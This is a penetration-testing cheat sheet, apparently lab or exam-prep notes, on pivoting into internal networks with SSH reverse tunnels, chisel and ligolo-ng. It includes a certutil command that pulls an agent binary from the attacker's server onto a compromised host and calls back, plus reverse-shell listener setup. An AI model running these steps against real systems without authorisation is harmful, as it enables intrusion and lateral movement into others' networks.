Port Forwarding

Last updated 25 days ago

SSH

  • Method 1:

On Kali machine:
 sudo systemctl start ssh
 nano /etc/proxychains.conf
  # Append: socks5 127.0.0.1 <port>
  # From here on, prefix any command aimed at the internal network with proxychains

On Victim machine:
 ssh -N -R <port> kali@192.168.45.x

  • Method 2:

ssh <user>@<IP> -L <port>:127.0.0.1:<port>
 # Target 127.0.0.1:<port> to access the target machine's "hidden" port

Chisel

On Kali machine:
    ./chisel_linux server -p 8001 --reverse


On Pivot machine:
    .\chisel.exe client <Kali IP>:8001 R:3306:<Target IP>:3306
    
    OR

    .\chisel.exe client <Kali IP>:8001 R:socks
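Before prefixing commands with proxychains, /etc/proxychains.conf has to point at the SOCKS5 port opened by Method 1 (ssh -R) or by chisel's R:socks, and the default "socks4 127.0.0.1 9050" entry that ships with proxychains has to be disabled, because strict_chain requires every listed proxy to answer. The helper below is an added example, not part of the original notes; it edits whatever config path it is given and assumes GNU sed.

```shell
#!/usr/bin/env bash
# Added example: rewrite a proxychains config so that exactly one proxy entry is
# active, the SOCKS5 port of our pivot. Other entries (such as the stock
# "socks4 127.0.0.1 9050" Tor line) are commented out rather than deleted.
# Usage: configure_proxychains <conf_file> <socks_port>   (assumes GNU sed)
set -u

configure_proxychains() {
    local conf="$1" port="$2"
    # Accept only a numeric TCP port in range
    case "$port" in
        ''|*[!0-9]*) echo "invalid port: $port" >&2; return 1 ;;
    esac
    [ "$port" -ge 1 ] && [ "$port" -le 65535 ] || { echo "port out of range: $port" >&2; return 1; }
    [ -f "$conf" ] || { echo "no such file: $conf" >&2; return 1; }
    # Comment out every active proxy line except the one we want to keep
    sed -i -E "/^socks5 127\.0\.0\.1 ${port}\$/! s/^[[:space:]]*(socks4|socks5|http)[[:space:]]/# &/" "$conf"
    # Append our entry only if it is not already present and active
    grep -qE "^socks5 127\.0\.0\.1 ${port}\$" "$conf" || echo "socks5 127.0.0.1 ${port}" >> "$conf"
}

# Print the proxy lines that proxychains will actually use (uncommented ones)
active_proxies() {
    grep -E '^[[:space:]]*(socks4|socks5|http)[[:space:]]' "$1" || true
}
```

Run `active_proxies /etc/proxychains.conf` afterwards; if more than one line comes back, proxychains will try to chain through all of them.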

Ligolo-ng

  1. Set up ligolo

On Kali Machine:
    sudo ip tuntap add user kali mode tun ligolo
    sudo ip link set ligolo up
    sudo ip route add <Internal net>/24 dev ligolo

    mkdir ligolo && cd ligolo
    
    mkdir proxy && cd proxy
    wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz
    tar -xf ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz && rm ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz
    
    cd ..
    
    mkdir agents && cd agents
    mkdir windows && cd windows
    wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_agent_0.7.5_windows_amd64.zip
    unzip ligolo-ng_agent_0.7.5_windows_amd64.zip && rm ligolo-ng_agent_0.7.5_windows_amd64.zip
    
    cd ..
    
    mkdir linux && cd linux
    wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_agent_0.7.5_linux_amd64.tar.gz
    tar -xf ligolo-ng_agent_0.7.5_linux_amd64.tar.gz && rm ligolo-ng_agent_0.7.5_linux_amd64.tar.gz
    
    cd ..
    
    python3 -m http.server 80 

On MS01:
    certutil -urlcache -split -f http://192.168.45.200/<platform>/agent.exe

  2. Initiate tunnel

On Kali Machine (~/ligolo/proxy):
    ./proxy -selfcert
    # Take note of the port this service starts on

On MS01:
    agent.exe -connect <kali IP>:<ligolo service port> -ignore-cert
        # Default port is: 11601
    
Once Agent joins the Server, Return to Kali terminal:
    session
    <enter>
    ifconfig # Verify interfaces of agent
    start # Creates a tunnel that allows our kali to access the internal network
    
    # Add listeners for whatever the internal network needs to reach you for (reverse shells, file downloads):
    # internal hosts connect to the pivot on <pivot port>, and ligolo relays the connection to <destination IP>:<destination port>
    listener_add --addr 0.0.0.0:<pivot port> --to <destination IP>:<destination port> 
    listener_list # Verify listener added
  • You can now reach the internal network directly, as if it were part of your own network

  • The difference is that the internal machines talk to your proxy (the pivot point) rather than directly to you

GitHub - jpillora/chisel: A fast TCP/UDP tunnel over HTTP
GitHub - nicocha30/ligolo-ng: An advanced, yet simple, tunneling/pivoting tool that uses a TUN interface.